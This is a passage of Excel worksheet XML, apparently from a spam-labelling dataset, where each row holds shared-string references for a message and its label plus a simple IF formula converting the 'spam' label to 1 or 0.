    <row r="4363" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4363" t="s">
        <v>9377</v>
      </c>
      <c r="B4363" t="s">
        <v>5294</v>
      </c>
      <c r="C4363" s="1">
        <f>IF(B4363="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4364" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4364" t="s">
        <v>9378</v>
      </c>
      <c r="B4364" t="s">
        <v>5294</v>
      </c>
      <c r="C4364" s="1">
        <f>IF(B4364="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4365" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4365" t="s">
        <v>9379</v>
      </c>
      <c r="B4365" t="s">
        <v>5294</v>
      </c>
      <c r="C4365" s="1">
        <f>IF(B4365="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4366" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4366" t="s">
        <v>9380</v>
      </c>
      <c r="B4366" t="s">
        <v>5294</v>
      </c>
      <c r="C4366" s="1">
        <f>IF(B4366="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4367" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4367" t="s">
        <v>9381</v>
      </c>
      <c r="B4367" t="s">
        <v>5294</v>
      </c>
      <c r="C4367" s="1">
        <f>IF(B4367="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4368" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4368" t="s">
        <v>9382</v>
      </c>
      <c r="B4368" t="s">
        <v>5294</v>
      </c>
      <c r="C4368" s="1">
        <f>IF(B4368="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4369" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4369" t="s">
        <v>9383</v>
      </c>
      <c r="B4369" t="s">
        <v>5294</v>
      </c>
      <c r="C4369" s="1">
        <f>IF(B4369="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4370" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4370" t="s">
        <v>9384</v>
      </c>
      <c r="B4370" t="s">
        <v>5294</v>
      </c>
      <c r="C4370" s="1">
        <f>IF(B4370="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4371" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4371" t="s">
        <v>9385</v>
      </c>
      <c r="B4371" t="s">
        <v>5297</v>
      </c>
      <c r="C4371" s="1">
        <f>IF(B4371="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4372" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4372" t="s">
        <v>7396</v>
      </c>
      <c r="B4372" t="s">
        <v>5294</v>
      </c>
      <c r="C4372" s="1">
        <f>IF(B4372="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4373" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4373" t="s">
        <v>9386</v>
      </c>
      <c r="B4373" t="s">
        <v>5297</v>
      </c>
      <c r="C4373" s="1">
        <f>IF(B4373="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4374" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4374" t="s">
        <v>9387</v>
      </c>
      <c r="B4374" t="s">
        <v>5294</v>
      </c>
      <c r="C4374" s="1">
        <f>IF(B4374="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4375" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4375" t="s">
        <v>9388</v>
      </c>
      <c r="B4375" t="s">
        <v>5294</v>
      </c>
      <c r="C4375" s="1">
        <f>IF(B4375="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4376" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4376" t="s">
        <v>9389</v>
      </c>
      <c r="B4376" t="s">
        <v>5297</v>
      </c>
      <c r="C4376" s="1">
        <f>IF(B4376="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4377" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4377" t="s">
        <v>9390</v>
      </c>
      <c r="B4377" t="s">
        <v>5297</v>
      </c>
      <c r="C4377" s="1">
        <f>IF(B4377="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4378" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4378" t="s">
        <v>9391</v>
      </c>
      <c r="B4378" t="s">
        <v>5294</v>
      </c>
      <c r="C4378" s="1">
        <f>IF(B4378="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4379" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4379" t="s">
        <v>9392</v>
      </c>
      <c r="B4379" t="s">
        <v>5294</v>
      </c>
      <c r="C4379" s="1">
        <f>IF(B4379="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4380" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4380" t="s">
        <v>9393</v>
      </c>
      <c r="B4380" t="s">
        <v>5294</v>
      </c>
      <c r="C4380" s="1">
        <f>IF(B4380="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4381" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4381" t="s">
        <v>9394</v>
      </c>
      <c r="B4381" t="s">
        <v>5294</v>
      </c>
      <c r="C4381" s="1">
        <f>IF(B4381="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4382" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4382" t="s">
        <v>9395</v>
      </c>
      <c r="B4382" t="s">
        <v>5294</v>
      </c>
      <c r="C4382" s="1">
        <f>IF(B4382="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4383" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4383" t="s">
        <v>9396</v>
      </c>
      <c r="B4383" t="s">
        <v>5294</v>
      </c>
      <c r="C4383" s="1">
        <f>IF(B4383="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4384" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4384" t="s">
        <v>9397</v>
      </c>
      <c r="B4384" t="s">
        <v>5294</v>
      </c>
      <c r="C4384" s="1">
        <f>IF(B4384="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4385" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4385" t="s">
        <v>9398</v>
      </c>
      <c r="B4385" t="s">
        <v>5294</v>
      </c>
      <c r="C4385" s="1">
        <f>IF(B4385="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4386" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4386" t="s">
        <v>9399</v>
      </c>
      <c r="B4386" t="s">
        <v>5297</v>
      </c>
      <c r="C4386" s="1">
        <f>IF(B4386="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4387" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4387" t="s">
        <v>9400</v>
      </c>
      <c r="B4387" t="s">
        <v>5294</v>
      </c>
      <c r="C4387" s="1">
        <f>IF(B4387="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4388" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4388" t="s">
        <v>9401</v>
      </c>
      <c r="B4388" t="s">
        <v>5294</v>
      </c>
      <c r="C4388" s="1">
        <f>IF(B4388="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4389" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4389" t="s">
        <v>9402</v>
      </c>
      <c r="B4389" t="s">
        <v>5294</v>
      </c>
      <c r="C4389" s="1">
        <f>IF(B4389="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4390" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4390" t="s">
        <v>9403</v>
      </c>
      <c r="B4390" t="s">
        <v>5294</v>
      </c>
      <c r="C4390" s="1">
        <f>IF(B4390="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4391" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4391" t="s">
        <v>7022</v>
      </c>
      <c r="B4391" t="s">
        <v>5294</v>
      </c>
      <c r="C4391" s="1">
        <f>IF(B4391="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4392" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4392" t="s">
        <v>9290</v>
      </c>
      <c r="B4392" t="s">
        <v>5294</v>
      </c>
      <c r="C4392" s="1">
        <f>IF(B4392="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4393" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4393" t="s">
        <v>9404</v>
      </c>
      <c r="B4393" t="s">
        <v>5294</v>
      </c>
      <c r="C4393" s="1">
        <f>IF(B4393="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4394" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4394" t="s">
        <v>9405</v>
      </c>
      <c r="B4394" t="s">
        <v>5297</v>
      </c>
      <c r="C4394" s="1">
        <f>IF(B4394="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4395" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4395" t="s">
        <v>9406</v>
      </c>
      <c r="B4395" t="s">
        <v>5294</v>
      </c>
      <c r="C4395" s="1">
        <f>IF(B4395="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4396" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4396" t="s">
        <v>9407</v>
      </c>
      <c r="B4396" t="s">
        <v>5294</v>
      </c>
      <c r="C4396" s="1">
        <f>IF(B4396="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4397" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4397" t="s">
        <v>9408</v>
      </c>
      <c r="B4397" t="s">
        <v>5294</v>
      </c>
      <c r="C4397" s="1">
        <f>IF(B4397="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4398" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4398" t="s">
        <v>9409</v>
      </c>
      <c r="B4398" t="s">
        <v>5294</v>
      </c>
      <c r="C4398" s="1">
        <f>IF(B4398="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4399" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4399" t="s">
        <v>9410</v>
      </c>
      <c r="B4399" t="s">
        <v>5294</v>
      </c>
      <c r="C4399" s="1">
        <f>IF(B4399="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4400" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4400" t="s">
        <v>9411</v>
      </c>
      <c r="B4400" t="s">
        <v>5294</v>
      </c>
      <c r="C4400" s="1">
        <f>IF(B4400="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4401" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4401" t="s">
        <v>9412</v>
      </c>
      <c r="B4401" t="s">
        <v>5294</v>
      </c>
      <c r="C4401" s="1">
        <f>IF(B4401="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4402" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4402" t="s">
        <v>9413</v>
      </c>
      <c r="B4402" t="s">
        <v>5294</v>
      </c>
      <c r="C4402" s="1">
        <f>IF(B4402="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4403" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4403" t="s">
        <v>9414</v>
      </c>
      <c r="B4403" t="s">
        <v>5294</v>
      </c>
      <c r="C4403" s="1">
        <f>IF(B4403="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4404" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4404" t="s">
        <v>9415</v>
      </c>
      <c r="B4404" t="s">
        <v>5294</v>
      </c>
      <c r="C4404" s="1">
        <f>IF(B4404="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4405" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4405" t="s">
        <v>9416</v>
      </c>
      <c r="B4405" t="s">
        <v>5294</v>
      </c>
      <c r="C4405" s="1">
        <f>IF(B4405="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4406" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4406" t="s">
        <v>9417</v>
      </c>
      <c r="B4406" t="s">
        <v>5294</v>
      </c>
      <c r="C4406" s="1">
        <f>IF(B4406="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4407" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4407" t="s">
        <v>9418</v>
      </c>
      <c r="B4407" t="s">
        <v>5297</v>
      </c>
      <c r="C4407" s="1">
        <f>IF(B4407="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4408" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4408" t="s">
        <v>9419</v>
      </c>
      <c r="B4408" t="s">
        <v>5294</v>
      </c>
      <c r="C4408" s="1">
        <f>IF(B4408="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4409" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4409" t="s">
        <v>9420</v>
      </c>
      <c r="B4409" t="s">
        <v>5294</v>
      </c>
      <c r="C4409" s="1">
        <f>IF(B4409="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4410" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4410" t="s">
        <v>9421</v>
      </c>
      <c r="B4410" t="s">
        <v>5297</v>
      </c>
      <c r="C4410" s="1">
        <f>IF(B4410="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4411" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4411" t="s">
        <v>9422</v>
      </c>
      <c r="B4411" t="s">
        <v>5294</v>
      </c>
      <c r="C4411" s="1">
        <f>IF(B4411="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4412" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4412" t="s">
        <v>9423</v>
      </c>
      <c r="B4412" t="s">
        <v>5294</v>
      </c>
      <c r="C4412" s="1">
        <f>IF(B4412="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4413" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4413" t="s">
        <v>9424</v>
      </c>
      <c r="B4413" t="s">
        <v>5294</v>
      </c>
      <c r="C4413" s="1">
        <f>IF(B4413="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4414" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4414" t="s">
        <v>7467</v>
      </c>
      <c r="B4414" t="s">
        <v>5294</v>
      </c>
      <c r="C4414" s="1">
        <f>IF(B4414="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4415" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4415" t="s">
        <v>9425</v>
      </c>
      <c r="B4415" t="s">
        <v>5294</v>
      </c>
      <c r="C4415" s="1">
        <f>IF(B4415="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4416" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4416" t="s">
        <v>9426</v>
      </c>
      <c r="B4416" t="s">
        <v>5294</v>
      </c>
      <c r="C4416" s="1">
        <f>IF(B4416="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4417" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4417" t="s">
        <v>9427</v>
      </c>
      <c r="B4417" t="s">
        <v>5294</v>
      </c>
      <c r="C4417" s="1">
        <f>IF(B4417="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4418" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4418" t="s">
        <v>9428</v>
      </c>
      <c r="B4418" t="s">
        <v>5294</v>
      </c>
      <c r="C4418" s="1">
        <f>IF(B4418="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4419" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4419" t="s">
        <v>9429</v>
      </c>
      <c r="B4419" t="s">
        <v>5294</v>
      </c>
      <c r="C4419" s="1">
        <f>IF(B4419="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4420" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4420" t="s">
        <v>9430</v>
      </c>
      <c r="B4420" t="s">
        <v>5294</v>
      </c>
      <c r="C4420" s="1">
        <f>IF(B4420="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4421" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4421" t="s">
        <v>6077</v>
      </c>
      <c r="B4421" t="s">
        <v>5294</v>
      </c>
      <c r="C4421" s="1">
        <f>IF(B4421="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4422" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4422" t="s">
        <v>9431</v>
      </c>
      <c r="B4422" t="s">
        <v>5294</v>
      </c>
      <c r="C4422" s="1">
        <f>IF(B4422="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4423" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4423" t="s">
        <v>9432</v>
      </c>
      <c r="B4423" t="s">
        <v>5294</v>
      </c>
      <c r="C4423" s="1">
        <f>IF(B4423="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4424" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4424" t="s">
        <v>9433</v>
      </c>
      <c r="B4424" t="s">
        <v>5294</v>
      </c>
      <c r="C4424" s="1">
        <f>IF(B4424="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4425" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4425" t="s">
        <v>9434</v>
      </c>
      <c r="B4425" t="s">
        <v>5294</v>
      </c>
      <c r="C4425" s="1">
        <f>IF(B4425="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4426" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4426" t="s">
        <v>9435</v>
      </c>
      <c r="B4426" t="s">
        <v>5294</v>
      </c>
      <c r="C4426" s="1">
        <f>IF(B4426="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4427" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4427" t="s">
        <v>9436</v>
      </c>
      <c r="B4427" t="s">
        <v>5294</v>
      </c>
      <c r="C4427" s="1">
        <f>IF(B4427="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4428" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4428" t="s">
        <v>9437</v>
      </c>
      <c r="B4428" t="s">
        <v>5294</v>
      </c>
      <c r="C4428" s="1">
        <f>IF(B4428="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4429" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4429" t="s">
        <v>9438</v>
      </c>
      <c r="B4429" t="s">
        <v>5294</v>
      </c>
      <c r="C4429" s="1">
        <f>IF(B4429="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4430" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4430" t="s">
        <v>9439</v>
      </c>
      <c r="B4430" t="s">
        <v>5294</v>
      </c>
      <c r="C4430" s="1">
        <f>IF(B4430="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4431" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4431" t="s">
        <v>9440</v>
      </c>
      <c r="B4431" t="s">
        <v>5294</v>
      </c>
      <c r="C4431" s="1">
        <f>IF(B4431="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4432" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4432" t="s">
        <v>9441</v>
      </c>
      <c r="B4432" t="s">
        <v>5294</v>
      </c>
      <c r="C4432" s="1">
        <f>IF(B4432="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4433" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4433" t="s">
        <v>9442</v>
      </c>
      <c r="B4433" t="s">
        <v>5294</v>
      </c>
      <c r="C4433" s="1">
        <f>IF(B4433="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4434" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4434" t="s">
        <v>9443</v>
      </c>
      <c r="B4434" t="s">
        <v>5294</v>
      </c>
      <c r="C4434" s="1">
        <f>IF(B4434="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4435" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4435" t="s">
        <v>9444</v>
      </c>
      <c r="B4435" t="s">
        <v>5294</v>
      </c>
      <c r="C4435" s="1">
        <f>IF(B4435="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4436" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4436" t="s">
        <v>9445</v>
      </c>
      <c r="B4436" t="s">
        <v>5297</v>
      </c>
      <c r="C4436" s="1">
        <f>IF(B4436="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4437" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4437" t="s">
        <v>7892</v>
      </c>
      <c r="B4437" t="s">
        <v>5294</v>
      </c>
      <c r="C4437" s="1">
        <f>IF(B4437="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4438" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4438" t="s">
        <v>9446</v>
      </c>
      <c r="B4438" t="s">
        <v>5294</v>
      </c>
      <c r="C4438" s="1">
        <f>IF(B4438="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4439" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4439" t="s">
        <v>9447</v>
      </c>
      <c r="B4439" t="s">
        <v>5294</v>
      </c>
      <c r="C4439" s="1">
        <f>IF(B4439="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4440" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4440" t="s">
        <v>9448</v>
      </c>
      <c r="B4440" t="s">
        <v>5294</v>
      </c>
      <c r="C4440" s="1">
        <f>IF(B4440="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4441" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4441" t="s">
        <v>9449</v>
      </c>
      <c r="B4441" t="s">
        <v>5294</v>
      </c>
      <c r="C4441" s="1">
        <f>IF(B4441="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4442" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4442" t="s">
        <v>9450</v>
      </c>
      <c r="B4442" t="s">
        <v>5294</v>
      </c>
      <c r="C4442" s="1">
        <f>IF(B4442="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4443" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4443" t="s">
        <v>9451</v>
      </c>
      <c r="B4443" t="s">
        <v>5294</v>
      </c>
      <c r="C4443" s="1">
        <f>IF(B4443="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4444" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4444" t="s">
        <v>9452</v>
      </c>
      <c r="B4444" t="s">
        <v>5294</v>
      </c>
      <c r="C4444" s="1">
        <f>IF(B4444="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4445" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4445" t="s">
        <v>9453</v>
      </c>
      <c r="B4445" t="s">
        <v>5294</v>
      </c>
      <c r="C4445" s="1">
        <f>IF(B4445="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4446" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4446" t="s">
        <v>9454</v>
      </c>
      <c r="B4446" t="s">
        <v>5294</v>
      </c>
      <c r="C4446" s="1">
        <f>IF(B4446="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4447" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4447" t="s">
        <v>9455</v>
      </c>
      <c r="B4447" t="s">
        <v>5294</v>
      </c>
      <c r="C4447" s="1">
        <f>IF(B4447="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4448" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4448" t="s">
        <v>9456</v>
      </c>
      <c r="B4448" t="s">
        <v>5294</v>
      </c>
      <c r="C4448" s="1">
        <f>IF(B4448="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4449" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4449" t="s">
        <v>9457</v>
      </c>
      <c r="B4449" t="s">
        <v>5294</v>
      </c>
      <c r="C4449" s="1">
        <f>IF(B4449="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4450" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4450" t="s">
        <v>5363</v>
      </c>
      <c r="B4450" t="s">
        <v>5297</v>
      </c>
      <c r="C4450" s="1">
        <f>IF(B4450="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4451" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4451" t="s">
        <v>9458</v>
      </c>
      <c r="B4451" t="s">
        <v>5294</v>
      </c>
      <c r="C4451" s="1">
        <f>IF(B4451="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4452" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4452" t="s">
        <v>9459</v>
      </c>
      <c r="B4452" t="s">
        <v>5294</v>
      </c>
      <c r="C4452" s="1">
        <f>IF(B4452="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4453" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4453" t="s">
        <v>9460</v>
      </c>
      <c r="B4453" t="s">
        <v>5294</v>
      </c>
      <c r="C4453" s="1">
        <f>IF(B4453="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4454" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4454" t="s">
        <v>9461</v>
      </c>
      <c r="B4454" t="s">
        <v>5294</v>
      </c>
      <c r="C4454" s="1">
        <f>IF(B4454="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4455" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4455" t="s">
        <v>9462</v>
      </c>
      <c r="B4455" t="s">
        <v>5294</v>
      </c>
      <c r="C4455" s="1">
        <f>IF(B4455="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4456" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4456" t="s">
        <v>6639</v>
      </c>
      <c r="B4456" t="s">
        <v>5294</v>
      </c>
      <c r="C4456" s="1">
        <f>IF(B4456="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4457" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4457" t="s">
        <v>9463</v>
      </c>
      <c r="B4457" t="s">
        <v>5294</v>
      </c>
      <c r="C4457" s="1">
        <f>IF(B4457="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4458" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4458" t="s">
        <v>9464</v>
      </c>
      <c r="B4458" t="s">
        <v>5294</v>
      </c>
      <c r="C4458" s="1">
        <f>IF(B4458="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4459" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4459" t="s">
        <v>9465</v>
      </c>
      <c r="B4459" t="s">
        <v>5294</v>
      </c>
      <c r="C4459" s="1">
        <f>IF(B4459="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4460" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4460" t="s">
        <v>9466</v>
      </c>
      <c r="B4460" t="s">
        <v>5297</v>
      </c>
      <c r="C4460" s="1">
        <f>IF(B4460="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4461" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4461" t="s">
        <v>9467</v>
      </c>
      <c r="B4461" t="s">
        <v>5294</v>
      </c>
      <c r="C4461" s="1">
        <f>IF(B4461="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4462" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4462" t="s">
        <v>9468</v>
      </c>
      <c r="B4462" t="s">
        <v>5294</v>
      </c>
      <c r="C4462" s="1">
        <f>IF(B4462="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4463" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4463" t="s">
        <v>9469</v>
      </c>
      <c r="B4463" t="s">
        <v>5294</v>
      </c>
      <c r="C4463" s="1">
        <f>IF(B4463="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4464" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4464" t="s">
        <v>9470</v>
      </c>
      <c r="B4464" t="s">
        <v>5294</v>
      </c>
      <c r="C4464" s="1">
        <f>IF(B4464="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4465" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4465" t="s">
        <v>5542</v>
      </c>
      <c r="B4465" t="s">
        <v>5294</v>
      </c>
      <c r="C4465" s="1">
        <f>IF(B4465="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4466" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4466" t="s">
        <v>9471</v>
      </c>
      <c r="B4466" t="s">
        <v>5294</v>
      </c>
      <c r="C4466" s="1">
        <f>IF(B4466="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
